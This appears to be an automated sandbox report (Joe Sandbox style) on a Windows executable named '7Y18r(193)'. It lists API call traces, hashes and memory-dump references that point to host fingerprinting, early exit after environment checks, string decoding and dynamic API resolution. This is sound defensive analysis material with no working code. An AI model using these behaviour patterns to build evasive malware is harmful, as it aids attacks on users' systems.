                                          • Opcode ID: f4314c0d61d3668132984408b610dbaf50f4d41d13c4530c7f71ebed696481c3
                                          • Instruction ID: b4e7f847ca15252535ac621e6aec1c0ad60fe03609a2dc74cb973100ed748bc2
                                          • Opcode Fuzzy Hash: f4314c0d61d3668132984408b610dbaf50f4d41d13c4530c7f71ebed696481c3
                                          • Instruction Fuzzy Hash: 17F0F4F5D10108BBCB00EFA5EC469DEB778AF44344F004179FA0AA7251FA35AB148BD5

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 368 401130-401139 call 4107d0 370 40113e-401149 call 4114a0 368->370 373 40114b-401162 call 410790 call 4114a0 370->373 374 40116c-40116d 370->374 373->374 379 401164-401166 ExitProcess 373->379
                                          APIs
                                            • Part of subcall function 004107D0: GetProcessHeap.KERNEL32(00000000,00000104,0041047C,00414682), ref: 004107DD
                                            • Part of subcall function 004107D0: RtlAllocateHeap.NTDLL(00000000), ref: 004107E4
                                            • Part of subcall function 004107D0: GetComputerNameA.KERNEL32(?,00000104), ref: 004107FC
                                            • Part of subcall function 00410790: GetProcessHeap.KERNEL32(00000000,00000104,00401157,008859E0,0041047C,00414682), ref: 0041079D
                                            • Part of subcall function 00410790: RtlAllocateHeap.NTDLL(00000000), ref: 004107A4
                                            • Part of subcall function 00410790: GetUserNameA.ADVAPI32(?,00000104), ref: 004107BC
                                          • ExitProcess.KERNEL32 ref: 00401166
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                                          • String ID:
                                          • API String ID: 3550813701-0
                                          • Opcode ID: 5dfcc54ffe1d84541331d60e85deac2731487983c969969cd2bbe61fc7e4cd1a
                                          • Instruction ID: 009d718b1f3313d18a5447f6fd2ac7483f7ff0e3748da63a0536e0034ff0befe
                                          • Opcode Fuzzy Hash: 5dfcc54ffe1d84541331d60e85deac2731487983c969969cd2bbe61fc7e4cd1a
                                          • Instruction Fuzzy Hash: 6EE0EC75D003005ADA0477B67C46BA7329D5B1476EF08142BBA09D76A2ED79F88046A9
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008E5A87
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511687586.00000000008E2000.00000040.00000020.00020000.00000000.sdmp, Offset: 008E2000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8e2000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction ID: 407d6f7bb01569ab80105a782e4e1c1c5b307a9889183e7b8603cfd879d4ba76
                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction Fuzzy Hash: 5E112B79A00208EFDB01DF99C985E98BBF5EF08350F0580A5F9489B362D371EA50DB80
                                          APIs
                                          • memset.MSVCRT ref: 0089890A
                                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00898928
                                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00898933
                                          • memcpy.MSVCRT ref: 008989C9
                                          • lstrcat.KERNEL32(?,004146BB), ref: 008989FA
                                          • lstrcat.KERNEL32(?,004146BE), ref: 00898A0E
                                          • lstrcat.KERNEL32(?,004146BF), ref: 00898A2F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 1498829745-0
                                          • Opcode ID: 134917050474b7d471302aba955204530b09060d99e16b36599f7380df89fb26
                                          • Instruction ID: a17c08addfeabe1fc2718cde13bedcb80887db9ff9d06846a9f1e8296631ebe6
                                          • Opcode Fuzzy Hash: 134917050474b7d471302aba955204530b09060d99e16b36599f7380df89fb26
                                          • Instruction Fuzzy Hash: F8416F74D0421ADFCB10DF94DC89BEEB7B9FB48344F1481AAE509A7280DB745A84CF95
                                          APIs
                                          • memset.MSVCRT ref: 004086A3
                                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00000000), ref: 004086C1
                                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004086CC
                                          • memcpy.MSVCRT ref: 00408762
                                          • lstrcat.KERNEL32(?,004146BB), ref: 00408793
                                          • lstrcat.KERNEL32(?,004146BE), ref: 004087A7
                                          • lstrcat.KERNEL32(?,004146BF), ref: 004087C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 1498829745-0
                                          • Opcode ID: 8a73fd9fc10429a265bf8a2eff6282a9fe706f3605447b558db16ccf288bb887
                                          • Instruction ID: 759f9b94f9dab68f757ef779266350902495f1571f1d3faef8656b0f6ccbf499
                                          • Opcode Fuzzy Hash: 8a73fd9fc10429a265bf8a2eff6282a9fe706f3605447b558db16ccf288bb887
                                          • Instruction Fuzzy Hash: D3415074904219DFDB10DF90DD89BEEB7B9BB84304F2081A9E509A7280DB745A84CF95
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: .$GetProcAddress.$l
                                          • API String ID: 0-2784972518
                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                          • Instruction ID: adcd894b9609cd8df190261d58f918eeacb957f99d2b879a591d27d843b4e4d9
                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                          • Instruction Fuzzy Hash: 713139B6900619DFDB10DF99C880AAEBBF5FF48328F29414AD841E7211D771EA45CFA4
                                          APIs
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894265,00000000,00000000), ref: 00896446
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894265,00000000,00000000), ref: 00896481
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BinaryCryptString
                                          • String ID:
                                          • API String ID: 80407269-0
                                          • Opcode ID: a6a986cbc8e55ee5929cc1eba7284e3845e126ec7f7828f9e015dbd4a27db1fc
                                          • Instruction ID: 74b32dad661fcf59a1ac1bacc30024e4203d157c2211ef7f4e1affd5b36176da
                                          • Opcode Fuzzy Hash: a6a986cbc8e55ee5929cc1eba7284e3845e126ec7f7828f9e015dbd4a27db1fc
                                          • Instruction Fuzzy Hash: 87119374240308AFEB10CFA4CC95FAA77BAEB89714F248059FE159B2D0CB75A940CB54
                                          APIs
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00403FFE,00000000,00000000), ref: 004061DF
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00403FFE,00000000,00000000), ref: 0040621A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BinaryCryptString
                                          • String ID:
                                          • API String ID: 80407269-0
                                          • Opcode ID: a6a986cbc8e55ee5929cc1eba7284e3845e126ec7f7828f9e015dbd4a27db1fc
                                          • Instruction ID: 729aa2d3dc43638b2e33bd8714632e0c107de5e481ca57dda5c091d028960453
                                          • Opcode Fuzzy Hash: a6a986cbc8e55ee5929cc1eba7284e3845e126ec7f7828f9e015dbd4a27db1fc
                                          • Instruction Fuzzy Hash: FB11A274240308AFEB10CFA4CC95FAA77B6EB89714F208099F9159B3D0C7B6A941CB94
                                          APIs
                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00410468,00414682), ref: 0040110A
                                          • ExitProcess.KERNEL32 ref: 0040111E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitInfoProcessSystem
                                          • String ID:
                                          • API String ID: 752954902-0
                                          • Opcode ID: a3b717a55ee685600f595bc677bd0d4703727e43f2e371a15f31c4c66d20cbad
                                          • Instruction ID: f9823d39dc976000c3da713aa6482b3ec4faedef8429ce93733dd161ba641eda
                                          • Opcode Fuzzy Hash: a3b717a55ee685600f595bc677bd0d4703727e43f2e371a15f31c4c66d20cbad
                                          • Instruction Fuzzy Hash: BBD05E74D0030CCFCB04DFE09D895DDBBB9FB0C311F141456D90573290DA305450CAA5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511687586.00000000008E2000.00000040.00000020.00020000.00000000.sdmp, Offset: 008E2000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8e2000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                          • Instruction ID: 2a9635e6a32ae64aa452f477ad345632ba43535f0ecccf6fe6c5d7bb3cf36bba
                                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                          • Instruction Fuzzy Hash: BC1170723405009FD744DF5ADC81FA673EAFB99328B698055ED04CB316D675EC01C760
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: adc30a1db24ea9d074b98ce1ae4fdb2e37112b58be16ed2b7118c8619b8e90a7
                                          • Instruction ID: db5e6c91cca67ae90cb676a9e8c6fa7568263c16057e7cbceeb6966ea00e904f
                                          • Opcode Fuzzy Hash: adc30a1db24ea9d074b98ce1ae4fdb2e37112b58be16ed2b7118c8619b8e90a7
                                          • Instruction Fuzzy Hash: AE018F2291D3D19FCB57CF3488686427FB2EE4720479A19DEC4C18F523D621858AC742
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                          • Instruction ID: 1b35e33e417a343a45b1bc88ba0e5a1cab096ecf583cc3962548dd80f0843350
                                          • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                          • Instruction Fuzzy Hash: A3018F76A006048FDF21EF64C804BAE33F5FB86316F5945A5D90AD7281E774A9418F90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5723d8a4f13e80fdb60319108e426ce59ece776137d3dc195fcc8599d7aeed79
                                          • Instruction ID: c2e7c66bab7a1ac99f47eb2f94d62a15f672868f51dd82da93d8d03ab113a96e
                                          • Opcode Fuzzy Hash: 5723d8a4f13e80fdb60319108e426ce59ece776137d3dc195fcc8599d7aeed79
                                          • Instruction Fuzzy Hash: F0B012310557CC8AC10252495410A6077EC9304C11F000091E44843913C108F910C490
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5723d8a4f13e80fdb60319108e426ce59ece776137d3dc195fcc8599d7aeed79
                                          • Instruction ID: c2e7c66bab7a1ac99f47eb2f94d62a15f672868f51dd82da93d8d03ab113a96e
                                          • Opcode Fuzzy Hash: 5723d8a4f13e80fdb60319108e426ce59ece776137d3dc195fcc8599d7aeed79
                                          • Instruction Fuzzy Hash: F0B012310557CC8AC10252495410A6077EC9304C11F000091E44843913C108F910C490
                                          APIs
                                          • GetProcAddress.KERNEL32(006187D8,00618168), ref: 008A2428
                                          • GetProcAddress.KERNEL32(006187D8,0061850C), ref: 008A2441
                                          • GetProcAddress.KERNEL32(006187D8,00618578), ref: 008A2459
                                          • GetProcAddress.KERNEL32(006187D8,006181C8), ref: 008A2471
                                          • GetProcAddress.KERNEL32(006187D8,006181B4), ref: 008A248A
                                          • GetProcAddress.KERNEL32(006187D8,00618254), ref: 008A24A2
                                          • GetProcAddress.KERNEL32(006187D8,00618420), ref: 008A24BA
                                          • GetProcAddress.KERNEL32(006187D8,00618298), ref: 008A24D3
                                          • GetProcAddress.KERNEL32(006187D8,006184EC), ref: 008A24EB
                                          • GetProcAddress.KERNEL32(006187D8,00618490), ref: 008A2503
                                          • GetProcAddress.KERNEL32(006187D8,00618314), ref: 008A251C
                                          • GetProcAddress.KERNEL32(006187D8,00618248), ref: 008A2534
                                          • GetProcAddress.KERNEL32(006187D8,00618540), ref: 008A254C
                                          • GetProcAddress.KERNEL32(006187D8,00618018), ref: 008A2565
                                          • GetProcAddress.KERNEL32(006187D8,006184E4), ref: 008A257D
                                          • GetProcAddress.KERNEL32(006187D8,00618188), ref: 008A2595
                                          • GetProcAddress.KERNEL32(006187D8,00618370), ref: 008A25AE
                                          • GetProcAddress.KERNEL32(006187D8,00618568), ref: 008A25C6
                                          • GetProcAddress.KERNEL32(006187D8,00618024), ref: 008A25DE
                                          • GetProcAddress.KERNEL32(006187D8,00618090), ref: 008A25F7
                                          • GetProcAddress.KERNEL32(006187D8,00618214), ref: 008A260F
                                          • LoadLibraryA.KERNEL32(00618498,?,008A06A7), ref: 008A2621
                                          • LoadLibraryA.KERNEL32(006180E0,?,008A06A7), ref: 008A2632
                                          • LoadLibraryA.KERNEL32(00618068,?,008A06A7), ref: 008A2644
                                          • LoadLibraryA.KERNEL32(00618140,?,008A06A7), ref: 008A2656
                                          • LoadLibraryA.KERNEL32(00618284,?,008A06A7), ref: 008A2667
                                          • GetProcAddress.KERNEL32(006185FC,006183FC), ref: 008A2689
                                          • GetProcAddress.KERNEL32(0061871C,0061837C), ref: 008A26AA
                                          • GetProcAddress.KERNEL32(0061871C,00618130), ref: 008A26C2
                                          • GetProcAddress.KERNEL32(0061880C,006182F0), ref: 008A26E4
                                          • GetProcAddress.KERNEL32(006186D0,0061808C), ref: 008A2705
                                          • GetProcAddress.KERNEL32(00618700,0061836C), ref: 008A2726
                                          • GetProcAddress.KERNEL32(00618700,00414194), ref: 008A273D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID:
                                          • API String ID: 2238633743-0
                                          • Opcode ID: a6446af475f856057040de3f9c45a65888bee7be2fd0af68c1fc8b12d5e42eef
                                          • Instruction ID: 42f45a1398c14f4645ea26e2791acfaaecd85e9625a6333a9e78b724be7ac601
                                          • Opcode Fuzzy Hash: a6446af475f856057040de3f9c45a65888bee7be2fd0af68c1fc8b12d5e42eef
                                          • Instruction Fuzzy Hash: 3EA11AB55102409FC394DFA9EC88ADA77EBF78D701768E61BEA09C36A0DF359841CB50
                                          APIs
                                            • Part of subcall function 008A3337: lstrlen.KERNEL32(0089427C,?,?,0089427C,00414716), ref: 008A3342
                                            • Part of subcall function 008A3337: lstrcpy.KERNEL32(00414716,00000000), ref: 008A339C
                                            • Part of subcall function 008A34C7: lstrlen.KERNEL32(00000000,?,00000000,?,00000000,00414736,00414735), ref: 008A34DC
                                            • Part of subcall function 008A34C7: lstrcpy.KERNEL32(00000000), ref: 008A351B
                                            • Part of subcall function 008A34C7: lstrcat.KERNEL32(00000000,00000000), ref: 008A3529
                                            • Part of subcall function 008A33B7: lstrcpy.KERNEL32(?,00000000), ref: 008A341C
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008972A9
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 008972B0
                                          • lstrcat.KERNEL32(?,00000000), ref: 008973F1
                                          • lstrcat.KERNEL32(?,00414A08), ref: 00897400
                                          • lstrcat.KERNEL32(?,00000000), ref: 00897413
                                          • lstrcat.KERNEL32(?,00414A0C), ref: 00897422
                                          • lstrcat.KERNEL32(?,00000000), ref: 00897435
                                          • lstrcat.KERNEL32(?,00414A10), ref: 00897444
                                          • lstrcat.KERNEL32(?,00000000), ref: 00897457
                                          • lstrcat.KERNEL32(?,00414A14), ref: 00897466
                                          • lstrcat.KERNEL32(?,00000000), ref: 00897479
                                          • lstrcat.KERNEL32(?,00414A18), ref: 00897488
                                          • lstrcat.KERNEL32(?,00000000), ref: 0089749B
                                          • lstrcat.KERNEL32(?,00414A1C), ref: 008974AA
                                            • Part of subcall function 00896767: memcmp.MSVCRT ref: 00896782
                                            • Part of subcall function 00896767: memset.MSVCRT ref: 008967B5
                                          • lstrcat.KERNEL32(?,00000000), ref: 008974F3
                                          • lstrcat.KERNEL32(?,00414A20), ref: 0089750D
                                          • lstrlen.KERNEL32(?), ref: 0089754C
                                          • lstrlen.KERNEL32(?), ref: 0089755B
                                          • memset.MSVCRT ref: 008975A4
                                            • Part of subcall function 008A3257: lstrcpy.KERNEL32(5GA,00000000), ref: 008A329F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpylstrlen$Heapmemset$AllocateProcessmemcmp
                                          • String ID:
                                          • API String ID: 673082036-0
                                          • Opcode ID: 35d02b99f65f5b9c903c2c26e54eec1326a7691fa909ee767015df0a37c7766a
                                          • Instruction ID: 261f13cefb2f31e5a4d0979a0ae8bbc20396e0d4f21c59a3561403ff077fcf5c
                                          • Opcode Fuzzy Hash: 35d02b99f65f5b9c903c2c26e54eec1326a7691fa909ee767015df0a37c7766a
                                          • Instruction Fuzzy Hash: FE022971910108ABDF05EBA8DD96EFE7339FF65301F144159F106A35A1EE34AB48CB62
                                          APIs
                                            • Part of subcall function 004130D0: lstrlen.KERNEL32(00000000,?,?,0040F9D0,00414677,00414676,?,?,00410567,00000000,?,008859C8,?,00414834,?,00000000), ref: 004130DB
                                            • Part of subcall function 004130D0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413135
                                            • Part of subcall function 00413260: lstrlen.KERNEL32(?,00414838,?,00000000,00414682), ref: 00413275
                                            • Part of subcall function 00413260: lstrcpy.KERNEL32(00000000), ref: 004132B4
                                            • Part of subcall function 00413260: lstrcat.KERNEL32(00000000,00000000), ref: 004132C2
                                            • Part of subcall function 00413150: lstrcpy.KERNEL32(?,00414682), ref: 004131B5
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00407042
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00407049
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040718A
                                          • lstrcat.KERNEL32(?,00414A08), ref: 00407199
                                          • lstrcat.KERNEL32(?,00000000), ref: 004071AC
                                          • lstrcat.KERNEL32(?,00414A0C), ref: 004071BB
                                          • lstrcat.KERNEL32(?,00000000), ref: 004071CE
                                          • lstrcat.KERNEL32(?,00414A10), ref: 004071DD
                                          • lstrcat.KERNEL32(?,00000000), ref: 004071F0
                                          • lstrcat.KERNEL32(?,00414A14), ref: 004071FF
                                          • lstrcat.KERNEL32(?,00000000), ref: 00407212
                                          • lstrcat.KERNEL32(?,00414A18), ref: 00407221
                                          • lstrcat.KERNEL32(?,00000000), ref: 00407234
                                          • lstrcat.KERNEL32(?,00414A1C), ref: 00407243
                                            • Part of subcall function 00406500: memcmp.MSVCRT ref: 0040651B
                                            • Part of subcall function 00406500: memset.MSVCRT ref: 0040654E
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040728C
                                          • lstrcat.KERNEL32(?,00414A20), ref: 004072A6
                                          • lstrlen.KERNEL32(?), ref: 004072E5
                                          • lstrlen.KERNEL32(?), ref: 004072F4
                                          • memset.MSVCRT ref: 0040733D
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpylstrlen$Heapmemset$AllocateProcessmemcmp
                                          • String ID:
                                          • API String ID: 673082036-0
                                          • Opcode ID: d118afa1bda119b001ceff74a600667826f4035f7d95009499287c34a8604611
                                          • Instruction ID: 6691f588a9258b9fc81b87b5fa78a63e4fb191c346f6debf514e0fc625545640
                                          • Opcode Fuzzy Hash: d118afa1bda119b001ceff74a600667826f4035f7d95009499287c34a8604611
                                          • Instruction Fuzzy Hash: AC025F71910108ABCB04EFA1DC96EEE7779AF58306F10416EF506731A5DF386B88CB69
                                          APIs
                                            • Part of subcall function 008A3257: lstrcpy.KERNEL32(5GA,00000000), ref: 008A329F
                                            • Part of subcall function 008A34C7: lstrlen.KERNEL32(00000000,?,00000000,?,00000000,00414736,00414735), ref: 008A34DC
                                            • Part of subcall function 008A34C7: lstrcpy.KERNEL32(00000000), ref: 008A351B
                                            • Part of subcall function 008A34C7: lstrcat.KERNEL32(00000000,00000000), ref: 008A3529
                                            • Part of subcall function 008A33B7: lstrcpy.KERNEL32(?,00000000), ref: 008A341C
                                            • Part of subcall function 008A1837: GetSystemTime.KERNEL32(?,00618208,00414191,?,?,00000000,?,00618154,?,00417A94,?,?,?,00417A98,00414759), ref: 008A185D
                                            • Part of subcall function 008A3437: lstrcpy.KERNEL32(00000000,?), ref: 008A3489
                                            • Part of subcall function 008A3437: lstrcat.KERNEL32(00000000), ref: 008A3499
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0089912E
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00899135
                                          • lstrcat.KERNEL32(?,00000000), ref: 0089926F
                                          • lstrcat.KERNEL32(?,00414AB4), ref: 0089927E
                                          • lstrcat.KERNEL32(?,00000000), ref: 00899291
                                          • lstrcat.KERNEL32(?,00414AB8), ref: 008992A0
                                          • lstrcat.KERNEL32(?,00000000), ref: 008992B3
                                          • lstrcat.KERNEL32(?,00414ABC), ref: 008992C2
                                          • lstrcat.KERNEL32(?,00000000), ref: 008992D5
                                          • lstrcat.KERNEL32(?,00414AC0), ref: 008992E4
                                          • lstrcat.KERNEL32(?,00000000), ref: 008992F7
                                          • lstrcat.KERNEL32(?,00414AC4), ref: 00899306
                                          • lstrcat.KERNEL32(?,00000000), ref: 00899319
                                          • lstrcat.KERNEL32(?,00414AC8), ref: 00899328
                                          • lstrcat.KERNEL32(?,00000000), ref: 0089933B
                                          • lstrcat.KERNEL32(?,00414ACC), ref: 0089934A
                                            • Part of subcall function 008A3337: lstrlen.KERNEL32(0089427C,?,?,0089427C,00414716), ref: 008A3342
                                            • Part of subcall function 008A3337: lstrcpy.KERNEL32(00414716,00000000), ref: 008A339C
                                          • lstrlen.KERNEL32(?), ref: 00899391
                                          • lstrlen.KERNEL32(?), ref: 008993A0
                                          • memset.MSVCRT ref: 008993E9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$lstrlen$Heap$AllocateProcessSystemTimememset
                                          • String ID:
                                          • API String ID: 245975372-0
                                          • Opcode ID: 11ec1a2fe193cc1f3d8a417ba9b63f14695d7241628e5d7c4afcf79c9e2c0e96
                                          • Instruction ID: a60cb3a7eee8d6ebe5a0bd8aaa1d6a6a9fb2f953d582d3580e7d39aa075231f7
                                          • Opcode Fuzzy Hash: 11ec1a2fe193cc1f3d8a417ba9b63f14695d7241628e5d7c4afcf79c9e2c0e96
